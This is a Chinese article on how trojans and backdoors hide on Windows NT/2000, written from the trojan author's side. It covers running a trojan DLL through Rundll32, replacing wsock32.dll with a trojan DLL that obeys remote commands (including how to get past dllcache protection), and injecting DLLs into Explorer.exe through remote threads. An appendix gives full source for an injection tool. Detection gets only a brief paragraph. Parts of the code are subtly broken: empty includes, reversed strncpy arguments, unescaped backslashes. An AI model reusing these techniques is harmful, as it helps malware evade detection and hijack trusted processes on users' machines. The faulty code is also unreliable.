木馬/后門(mén)程序在WINNT中進(jìn)程隱藏和查找的方法

　　在WIN9X中，只需要將進(jìn)程注冊(cè)為系統(tǒng)服務(wù)就能夠從進(jìn)程查看器中隱形，可是這一切在WINNT中卻完全不同，無(wú)論木馬從端口、啟動(dòng)文件上如何巧妙地隱藏自己，始終都不能欺騙WINNT的任務(wù)管理器，以至于很多的朋友問(wèn)我：在WINNT下難道木馬真的再也無(wú)法隱藏自己的進(jìn)程了?本文試圖通過(guò)探討WINNT中木馬的幾種常用隱藏進(jìn)程手段，給大家揭示木馬/后門(mén)程序在WINNT中進(jìn)程隱藏的方法和查找的途徑。

　　我們知道，在WINDOWS系統(tǒng)下，可執(zhí)行文件主要是Exe和Com文件，這兩種文件在運(yùn)行時(shí)都有一個(gè)共同點(diǎn)，會(huì)生成一個(gè)獨(dú)立的進(jìn)程，查找特定進(jìn)程是我們發(fā)現(xiàn)木馬的主要方法之一(無(wú)論手動(dòng)還是防火墻)，隨著入侵檢測(cè)軟件的不斷發(fā)展，關(guān)聯(lián)進(jìn)程和SOCKET已經(jīng)成為流行的技術(shù)(例如著名的FPort就能夠檢測(cè)出任何進(jìn)程打開(kāi)的TCP/UDP端口)，假設(shè)一個(gè)木馬在運(yùn)行時(shí)被檢測(cè)軟件同時(shí)查出端口和進(jìn)程，我們基本上認(rèn)為這個(gè)木馬的隱藏已經(jīng)完全失敗(利用心理因素而非技術(shù)手段欺騙用戶(hù)的木馬不在我們的討論范圍之內(nèi))。在NT下正常情況用戶(hù)進(jìn)程對(duì)于系統(tǒng)管理員來(lái)說(shuō)都是可見(jiàn)的，要想做到木馬的進(jìn)程隱藏，有兩個(gè)辦法，第一是讓系統(tǒng)管理員看不見(jiàn)(或者視而不見(jiàn))你的進(jìn)程;第二是不使用進(jìn)程。

　　看不見(jiàn)進(jìn)程的方法就是進(jìn)行進(jìn)程欺騙，為了了解如何能使進(jìn)程看不見(jiàn)，我們首先要了解怎樣能看得見(jiàn)進(jìn)程：在Windows中有多種方法能夠看到進(jìn)程的存在：PSAPI(Process Status API)，PDH(Performance Data Helper)，ToolHelp API，如果我們能夠欺騙用戶(hù)或入侵檢測(cè)軟件用來(lái)查看進(jìn)程的函數(shù)(例如截獲相應(yīng)的API調(diào)用，替換返回的數(shù)據(jù))，我們就完全能實(shí)現(xiàn)進(jìn)程隱藏，但是一來(lái)我們并不知道用戶(hù)/入侵檢測(cè)軟件使用的是什么方法來(lái)查看進(jìn)程列表，二來(lái)如果我們有權(quán)限和技術(shù)實(shí)現(xiàn)這樣的欺騙，我們就一定能使用其它的方法更容易的實(shí)現(xiàn)進(jìn)程的隱藏。

　　第二種方法是不使用進(jìn)程，不使用進(jìn)程使用什么?為了弄明白這個(gè)問(wèn)題，我們必須要先了解Windows系統(tǒng)的另一種“可執(zhí)行文件”----DLL，DLL是Dynamic Link Library(動(dòng)態(tài)鏈接庫(kù))的縮寫(xiě)，DLL文件是Windows的基礎(chǔ)，因?yàn)樗械腁PI函數(shù)都是在DLL中實(shí)現(xiàn)的。DLL文件沒(méi)有程序邏輯，是由多個(gè)功能函數(shù)構(gòu)成，它并不能獨(dú)立運(yùn)行，一般都是由進(jìn)程加載并調(diào)用的。(你你你，你剛剛不是說(shuō)不用進(jìn)程了?)別急呀，聽(tīng)我慢慢道來(lái)：因?yàn)镈LL文件不能獨(dú)立運(yùn)行，所以在進(jìn)程列表中并不會(huì)出現(xiàn)DLL，假設(shè)我們編寫(xiě)了一個(gè)木馬DLL，并且通過(guò)別的進(jìn)程來(lái)運(yùn)行它，那么無(wú)論是入侵檢測(cè)軟件還是進(jìn)程列表中，都只會(huì)出現(xiàn)那個(gè)進(jìn)程而并不會(huì)出現(xiàn)木馬DLL，如果那個(gè)進(jìn)程是可信進(jìn)程，(例如資源管理器Explorer.exe，沒(méi)人會(huì)懷疑它是木馬吧?)那么我們編寫(xiě)的DLL作為那個(gè)進(jìn)程的一部分，也將成為被信賴(lài)的一員而為所欲為。

　　運(yùn)行DLL文件最簡(jiǎn)單的方法是利用Rundll32.exe，Rundll/Rundll32是Windows自帶的動(dòng)態(tài)鏈接庫(kù)工具，可以用來(lái)在命令行下執(zhí)行動(dòng)態(tài)鏈接庫(kù)中的某個(gè)函數(shù)，其中Rundll是16位而Rundll32是32位的(分別調(diào)用16位和32位的DLL文件)，Rundll32的使用方法如下：

　　Rundll32.exe DllFileName FuncName

　　例如我們編寫(xiě)了一個(gè)MyDll.dll，這個(gè)動(dòng)態(tài)鏈接庫(kù)中定義了一個(gè)MyFunc的函數(shù)，那么，我們通過(guò)Rundll32.exe MyDll.dll MyFunc就可以執(zhí)行MyFunc函數(shù)的功能。

　　如何運(yùn)行DLL文件和木馬進(jìn)程的隱藏有什么關(guān)系么?當(dāng)然有了，假設(shè)我們?cè)贛yFunc函數(shù)中實(shí)現(xiàn)了木馬的功能，那么我們不就可以通過(guò)Rundll32來(lái)運(yùn)行這個(gè)木馬了么?在系統(tǒng)管理員看來(lái)，進(jìn)程列表中增加的是Rundll32.exe而并不是木馬文件，這樣也算是木馬的一種簡(jiǎn)易欺騙和自我保護(hù)方法(至少你不能去把Rundll32.exe刪掉吧?)

　　使用Rundll32的方法進(jìn)行進(jìn)程隱藏是簡(jiǎn)易的，非常容易被識(shí)破。(雖然殺起來(lái)會(huì)麻煩一點(diǎn))比較高級(jí)的方法是使用特洛伊DLL，特洛伊DLL的工作原理是替換常用的DLL文件，將正常的調(diào)用轉(zhuǎn)發(fā)給原DLL，截獲并處理特定的消息。例如，我們知道WINDOWS的Socket 1.x的函數(shù)都是存放在wsock32.dll中的，那么我們自己寫(xiě)一個(gè)wsock32.dll文件，替換掉原先的wsock32.dll(將原先的DLL文件重命名為wsockold.dll)我們的wsock32.dll只做兩件事，一是如果遇到不認(rèn)識(shí)的調(diào)用，就直接轉(zhuǎn)發(fā)給wsockold.dll(使用函數(shù)轉(zhuǎn)發(fā)器forward);二是遇到特殊的請(qǐng)求(事先約定的)就解碼并處理。這樣理論上只要木馬編寫(xiě)者通過(guò)SOCKET遠(yuǎn)程輸入一定的暗號(hào)，就可以控制wsock32.dll(木馬DLL)做任何操作。特洛伊DLL技術(shù)是比較古老的技術(shù)，因此微軟也對(duì)此做了相當(dāng)?shù)姆婪?，在Win2K的system32目錄下有一個(gè)dllcache的目錄，這個(gè)目錄中存放著大量的DLL文件(也包括一些重要的exe文件)，這個(gè)是微軟用來(lái)保護(hù)DLL的法寶，一旦操作系統(tǒng)發(fā)現(xiàn)被保護(hù)的DLL文件被篡改(數(shù)字簽名技術(shù))，它就會(huì)自動(dòng)從dllcache中恢復(fù)這個(gè)文件。雖然說(shuō)先更改dllcache目錄中的備份再修改DLL文件本身可以繞過(guò)這個(gè)保護(hù)，但是可以想見(jiàn)的是微軟在未來(lái)必將更加小心地保護(hù)重要的DLL文件，同時(shí)特洛伊DLL方法本身有著一些漏洞(例如修復(fù)安裝、安裝補(bǔ)丁、檢查數(shù)字簽名等方法都有可能導(dǎo)致特洛伊DLL失效)，所以這個(gè)方法也不能算是DLL木馬的最優(yōu)選擇。

　　DLL木馬的最高境界是動(dòng)態(tài)嵌入技術(shù)，動(dòng)態(tài)嵌入技術(shù)指的是將自己的代碼嵌入正在運(yùn)行的進(jìn)程中的技術(shù)。理論上來(lái)說(shuō)，在Windows中的每個(gè)進(jìn)程都有自己的私有內(nèi)存空間，別的進(jìn)程是不允許對(duì)這個(gè)私有空間進(jìn)行操作的(私人領(lǐng)地、請(qǐng)勿入內(nèi))，但是實(shí)際上，我們?nèi)匀豢梢岳梅N種方法進(jìn)入并操作進(jìn)程的私有內(nèi)存。在多種動(dòng)態(tài)嵌入技術(shù)中(窗口Hook、掛接API、遠(yuǎn)程線程)，我最喜歡的是遠(yuǎn)程線程技術(shù)(其實(shí)、其實(shí)我就會(huì)這一種……)，下面就為大家介紹一下遠(yuǎn)程線程技術(shù)。

　　遠(yuǎn)程線程技術(shù)指的是通過(guò)在另一個(gè)運(yùn)行的進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法進(jìn)入那個(gè)線程的內(nèi)存地址空間。我們知道，在進(jìn)程中，可以通過(guò)CreateThread函數(shù)創(chuàng)建線程，被創(chuàng)建的新線程與主線程(就是進(jìn)程創(chuàng)建時(shí)被同時(shí)自動(dòng)建立的那個(gè)線程)共享地址空間以及其他的資源。但是很少有人知道，通過(guò)CreateRemoteThread也同樣可以在另一個(gè)進(jìn)程內(nèi)創(chuàng)建新線程，被創(chuàng)建的遠(yuǎn)程線程同樣可以共享遠(yuǎn)程進(jìn)程(注意：是遠(yuǎn)程進(jìn)程!)的地址空間，所以，實(shí)際上，我們通過(guò)創(chuàng)建一個(gè)遠(yuǎn)程線程，進(jìn)入了遠(yuǎn)程進(jìn)程的內(nèi)存地址空間，也就擁有了那個(gè)遠(yuǎn)程進(jìn)程相當(dāng)多的權(quán)限：例如啟動(dòng)一個(gè)DLL木馬(與進(jìn)入進(jìn)程內(nèi)部相比，啟動(dòng)一個(gè)DLL木馬是小意思，實(shí)際上我們可以隨意篡改那個(gè)進(jìn)程的數(shù)據(jù))

　　閑話少說(shuō)，我們來(lái)看代碼：

　　首先，我們通過(guò)OpenProcess 來(lái)打開(kāi)我們?cè)噲D嵌入的進(jìn)程(如果不允許打開(kāi)，那么嵌入就無(wú)法進(jìn)行了，這往往是由于權(quán)限不夠引起的，例如你試圖打開(kāi)一個(gè)受系統(tǒng)保護(hù)的進(jìn)程)

　　hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允許遠(yuǎn)程創(chuàng)建線程

　　PROCESS_VM_OPERATION | //允許遠(yuǎn)程VM操作

　　PROCESS_VM_WRITE, //允許遠(yuǎn)程VM寫(xiě)

　　FALSE, dwRemoteProcessId );

　　由于我們后面需要寫(xiě)入遠(yuǎn)程進(jìn)程的內(nèi)存地址空間并建立遠(yuǎn)程線程，所以需要申請(qǐng)足夠的權(quán)限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。

　　然后，我們可以建立LoadLibraryW這個(gè)線程來(lái)啟動(dòng)我們的DLL木馬，LoadLibraryW函數(shù)是在kernel32.dll中定義的，用來(lái)加載DLL文件，它只有一個(gè)參數(shù)，就是DLL文件的絕對(duì)路徑名pszLibFileName，(也就是木馬DLL的全路徑文件名)，但是由于木馬DLL是在遠(yuǎn)程進(jìn)程內(nèi)調(diào)用的，所以我們首先還需要將這個(gè)文件名復(fù)制到遠(yuǎn)程地址空間：(否則遠(yuǎn)程線程讀不到這個(gè)參數(shù))

　　//計(jì)算DLL路徑名需要的內(nèi)存空間

　　int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);

　　//使用VirtualAllocEx函數(shù)在遠(yuǎn)程進(jìn)程的內(nèi)存地址空間分配DLL文件名緩沖區(qū)

　　pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,

　　MEM_COMMIT, PAGE_READWRITE);

　　//使用WriteProcessMemory函數(shù)將DLL的路徑名復(fù)制到遠(yuǎn)程進(jìn)程的內(nèi)存空間

　　iReturnCode = WriteProcessMemory(hRemoteProcess,

　　pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

　　//計(jì)算LoadLibraryW的入口地址

　　PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)

　　GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

　　說(shuō)明一下，上面我們計(jì)算的其實(shí)是自己這個(gè)進(jìn)程內(nèi)LoadLibraryW的入口地址，但是因?yàn)閗ernel.dll模塊在所有進(jìn)程內(nèi)的地址都是相同的(屬于內(nèi)核模塊)，所以這個(gè)入口地址同樣適用于遠(yuǎn)程進(jìn)程。

　　OK，萬(wàn)事俱備，我們通過(guò)建立遠(yuǎn)程線程時(shí)的地址pfnStartAddr(實(shí)際上就是LoadLibraryW的入口地址)和傳遞的參數(shù)pszLibFileRemote(我們復(fù)制到遠(yuǎn)程進(jìn)程內(nèi)存空間的木馬DLL的全路徑文件名)在遠(yuǎn)程進(jìn)程內(nèi)啟動(dòng)我們的木馬DLL：

　　//啟動(dòng)遠(yuǎn)程線程LoadLibraryW，通過(guò)遠(yuǎn)程線程調(diào)用用戶(hù)的DLL文件

　　hRemoteThread = CreateRemoteThread(hRemoteProcess, //被嵌入的遠(yuǎn)程進(jìn)程

　　NULL, 0,

　　pfnStartAddr, //LoadLibraryW的入口地址

　　pszLibFileRemote, //木馬DLL的全路徑文件名

　　0, NULL);

　　至此，遠(yuǎn)程嵌入順利完成，為了試驗(yàn)我們的DLL是不是已經(jīng)正常的在遠(yuǎn)程線程運(yùn)行，我編寫(xiě)了以下的測(cè)試DLL，這個(gè)DLL什么都不做，僅僅返回所在進(jìn)程的PID：

　　BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)

　　{ char * szProcessId = (char *)malloc(10*sizeof(char));

　　switch (reason){

　　case DLL_PROCESS_ATTACH:{

　　//獲取并顯示當(dāng)前進(jìn)程ID

　　_itoa(GetCurrentProcessId(), szProcessId, 10);

　　MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

　　}

　　default:

　　return TRUE;

　　}

　　}

　　當(dāng)我使用RmtDll.exe程序?qū)⑦@個(gè)TestDLL.dll嵌入Explorer.exe進(jìn)程后(PID=1208)，該測(cè)試DLL彈出了1208字樣的確認(rèn)框，證明TestDLL.dll已經(jīng)在Explorer.exe進(jìn)程內(nèi)正確地運(yùn)行了。(木馬已經(jīng)成為Explorer.exe的一部分)

　　DLL木馬的查找：查找DLL木馬的基本思路是擴(kuò)展進(jìn)程列表至內(nèi)存模塊列表，內(nèi)存模塊列表將顯示每個(gè)進(jìn)程目前加載/調(diào)用的所有DLL文件，通過(guò)這種方法，我們能發(fā)現(xiàn)異常的DLL文件(前提是你對(duì)所有進(jìn)程需要調(diào)用的模塊都很熟悉，天哪，這幾乎是沒(méi)有可能的事，要知道隨便哪個(gè)進(jìn)程都會(huì)調(diào)用十七八個(gè)DLL文件，而Windows更是由數(shù)以千計(jì)的DLL所組成的，誰(shuí)能知道哪個(gè)有用哪個(gè)沒(méi)用?)對(duì)此，我寫(xiě)了一個(gè)內(nèi)存模塊查看軟件，在http://www.patching.net/shotgun/ps.zip可以下載，該軟件使用PSAPI，如果是NT4.0，需要PSAPI.dll的支持，所以我把PSAPI.dll也放在了壓縮包里。

　　進(jìn)一步想想，用遠(yuǎn)程線程技術(shù)啟動(dòng)木馬DLL還是比較有跡可尋的，如果事先將一段代碼復(fù)制進(jìn)遠(yuǎn)程進(jìn)程的內(nèi)存空間，然后通過(guò)遠(yuǎn)程線程起動(dòng)這段代碼，那么，即使遍歷進(jìn)程內(nèi)存模塊也無(wú)濟(jì)于事;或者遠(yuǎn)程線程切入某個(gè)原本就需要進(jìn)行SOCKET操作的進(jìn)程(如iExplorer.exe)，對(duì)函數(shù)調(diào)用或數(shù)據(jù)進(jìn)行某些有針對(duì)的修改……這樣的木馬并不需要自己打開(kāi)端口，代碼也只是存在于內(nèi)存中，可以說(shuō)如羚羊掛角，無(wú)跡可尋。

　　無(wú)論是使用特洛伊DLL還是使用遠(yuǎn)程線程，都是讓木馬的核心代碼運(yùn)行于別的進(jìn)程的內(nèi)存空間，這樣不僅能很好地隱藏自己，也能更好的保護(hù)自己。

　　這個(gè)時(shí)候，我們可以說(shuō)已經(jīng)實(shí)現(xiàn)了一個(gè)真正意義上的木馬，它不僅欺騙、進(jìn)入你的計(jì)算機(jī)，甚至進(jìn)入了用戶(hù)進(jìn)程的內(nèi)部，從某種意義上說(shuō)，這種木馬已經(jīng)具備了病毒的很多特性，例如隱藏和寄生(和宿主同生共死)，如果有一天，出現(xiàn)了具備所有病毒特性的木馬(不是指蠕蟲(chóng)，而是傳統(tǒng)意義上的寄生病毒)，我想我并不會(huì)感到奇怪，倒會(huì)疑問(wèn)這一天為什么這么遲才到來(lái)。

　　附錄：利用遠(yuǎn)程線程技術(shù)嵌入進(jìn)程的模型源碼：

　　/////////////////////////////////////////////////////////////////////////////////////////////// //

　　// Remote DLL For Win2K by Shotgun //

　　// This Program can inject a DLL into Remote Process //

　　// //

　　// Released: [2001.4] //

　　// Author: [Shotgun] //

　　// Email: [Shotgun@Xici.Net] //

　　// Homepage: //

　　// [http://IT.Xici.Net] //

　　// [http://WWW.Patching.Net] //

　　// //

　　// USAGE: //

　　// RmtDLL.exe PID[|ProcessName] DLLFullPathName //

　　// Example: //

　　// RmtDLL.exe 1024 C:\WINNT\System32\MyDLL.dll //

　　// RmtDLL.exe Explorer.exe C:\MyDLL.dll //

　　// //

　　///////////////////////////////////////////////////////////////////////////////////////////////

　　#include

　　#include

　　#include

　　#include

　　DWORD ProcessToPID( char *); //將進(jìn)程名轉(zhuǎn)換為PID的函數(shù)

　　void CheckError ( int, int, char *); //出錯(cuò)處理函數(shù)

　　void usage ( char *); //使用說(shuō)明函數(shù)

　　PDWORD pdwThreadId;

　　HANDLE hRemoteThread, hRemoteProcess;

　　DWORD fdwCreate, dwStackSize, dwRemoteProcessId;

　　PWSTR pszLibFileRemote=NULL;

　　void main(int argc,char **argv)

　　{

　　int iReturnCode;

　　char lpDllFullPathName[MAX_PATH];

　　WCHAR pszLibFileName[MAX_PATH]={0};

　　//處理命令行參數(shù)

　　if (argc!=3) usage("Parametes number incorrect!");

　　else{

　　//如果輸入的是進(jìn)程名，則轉(zhuǎn)化為PID

　　if(isdigit(*argv[1])) dwRemoteProcessId = atoi(argv[1]);

　　else dwRemoteProcessId = ProcessToPID(argv[1]);

　　//判斷輸入的DLL文件名是否是絕對(duì)路徑

　　if(strstr(argv[2],":\")!=NULL)

　　strncpy(argv[2], lpDllFullPathName, MAX_PATH);

　　else

　　{ //取得當(dāng)前目錄，將相對(duì)路徑轉(zhuǎn)換成絕對(duì)路徑

　　iReturnCode = GetCurrentDirectory(MAX_PATH, lpDllFullPathName);

　　CheckError(iReturnCode, 0, "GetCurrentDirectory");

　　strcat(lpDllFullPathName, "\");

　　strcat(lpDllFullPathName, argv[2]);

　　printf("Convert DLL filename to FullPathName:\n\t%s\n\n",

　　lpDllFullPathName);

　　}

　　//判斷DLL文件是否存在

　　iReturnCode=(int)_lopen(lpDllFullPathName, OF_READ);

　　CheckError(iReturnCode, HFILE_ERROR, "DLL File not Exist");

　　//將DLL文件全路徑的ANSI碼轉(zhuǎn)換成UNICODE碼

　　iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,

　　lpDllFullPathName, strlen(lpDllFullPathName),

　　pszLibFileName, MAX_PATH);

　　CheckError(iReturnCode, 0, "MultByteToWideChar");

　　//輸出最后的操作參數(shù)

　　wprintf(L"Will inject %s", pszLibFileName);

　　printf(" into process:%s PID=%d\n", argv[1], dwRemoteProcessId);

　　}

　　//打開(kāi)遠(yuǎn)程進(jìn)程

　　hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創(chuàng)建線程

　　PROCESS_VM_OPERATION | //允許VM操作

　　PROCESS_VM_WRITE, //允許VM寫(xiě)

　　FALSE, dwRemoteProcessId );

　　CheckError( (int) hRemoteProcess, NULL,

　　"Remote Process not Exist or Access Denied!");

　　//計(jì)算DLL路徑名需要的內(nèi)存空間

　　int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);

　　pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,

　　MEM_COMMIT, PAGE_READWRITE);

　　CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");

　　//將DLL的路徑名復(fù)制到遠(yuǎn)程進(jìn)程的內(nèi)存空間

　　iReturnCode = WriteProcessMemory(hRemoteProcess,

　　pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

　　CheckError(iReturnCode, false, "WriteProcessMemory");

　　//計(jì)算LoadLibraryW的入口地址

　　PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)

　　GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

　　CheckError((int)pfnStartAddr, NULL, "GetProcAddress");

　　//啟動(dòng)遠(yuǎn)程線程，通過(guò)遠(yuǎn)程線程調(diào)用用戶(hù)的DLL文件

　　hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);

　　CheckError((int)hRemoteThread, NULL, "Create Remote Thread");

　　//等待遠(yuǎn)程線程退出

　　WaitForSingleObject(hRemoteThread, INFINITE);

　　//清場(chǎng)處理

　　if (pszLibFileRemote != NULL)

　　VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);

　　if (hRemoteThread != NULL) CloseHandle(hRemoteThread );

　　if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);

　　}//end of main()

　　//將進(jìn)程名轉(zhuǎn)換為PID的函數(shù)

　　DWORD ProcessToPID(char *InputProcessName)

　　{

　　DWORD aProcesses[1024], cbNeeded, cProcesses;

　　unsigned int i;

　　HANDLE hProcess;

　　HMODULE hMod;

　　char szProcessName[MAX_PATH] = "UnknownProcess";

　　// 計(jì)算目前有多少進(jìn)程, aProcesses[]用來(lái)存放有效的進(jìn)程PIDs

　　if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return 0;

　　cProcesses = cbNeeded / sizeof(DWORD);

　　// 按有效的PID遍歷所有的進(jìn)程

　　for ( i = 0; i < cProcesses; i++ )

　　{

　　// 打開(kāi)特定PID的進(jìn)程

　　hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |

　　PROCESS_VM_READ,

　　FALSE, aProcesses[i]);

　　// 取得特定PID的進(jìn)程名

　　if ( hProcess )

　　{

　　if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )

　　{

　　GetModuleBaseName( hProcess, hMod,

　　szProcessName, sizeof(szProcessName) );

　　//將取得的進(jìn)程名與輸入的進(jìn)程名比較，如相同則返回進(jìn)程PID

　　if(!_stricmp(szProcessName, InputProcessName)){

　　CloseHandle( hProcess );

　　return aProcesses[i];

　　}

　　}

　　}//end of if ( hProcess )

　　}//end of for

　　//沒(méi)有找到相應(yīng)的進(jìn)程名，返回0

　　CloseHandle( hProcess );

　　return 0;

　　}//end of ProcessToPID

　　//錯(cuò)誤處理函數(shù)CheckError()

　　//如果iReturnCode等于iErrorCode,則輸出pErrorMsg并退出

　　void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)

　　{

　　if(iReturnCode==iErrorCode) {

　　printf("%s Error:%d\n\n", pErrorMsg, GetLastError());

　　//清場(chǎng)處理

　　if (pszLibFileRemote != NULL)

　　VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);

　　if (hRemoteThread != NULL) CloseHandle(hRemoteThread );

　　if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);

　　exit(0);

　　}

　　}//end of CheckError()

　　//使用方法說(shuō)明函數(shù)usage()

　　void usage(char * pErrorMsg)

　　{

　　printf("%s\n\n",pErrorMsg);

　　printf("\t\tRemote Process DLL by Shotgun\n");

　　printf("\tThis program can inject a DLL into remote process\n");

　　printf("Email:\n");

　　printf("\tShotgun@Xici.Net\n");

　　printf("HomePage:\n");

　　printf("\thttp://It.Xici.Net\n");

　　printf("\thttp://www.Patching.Net\n");

　　printf("USAGE:\n");

　　printf("\tRmtDLL.exe PID[|ProcessName] DLLFullPathName\n");

　　printf("Example:\n");

　　printf("\tRmtDLL.exe 1024 C:\\WINNT\\System32\\MyDLL.dll\n");

　　printf("\tRmtDLL.exe Explorer.exe C:\\MyDLL.dll\n");

　　exit(0);

　　}//end of usage()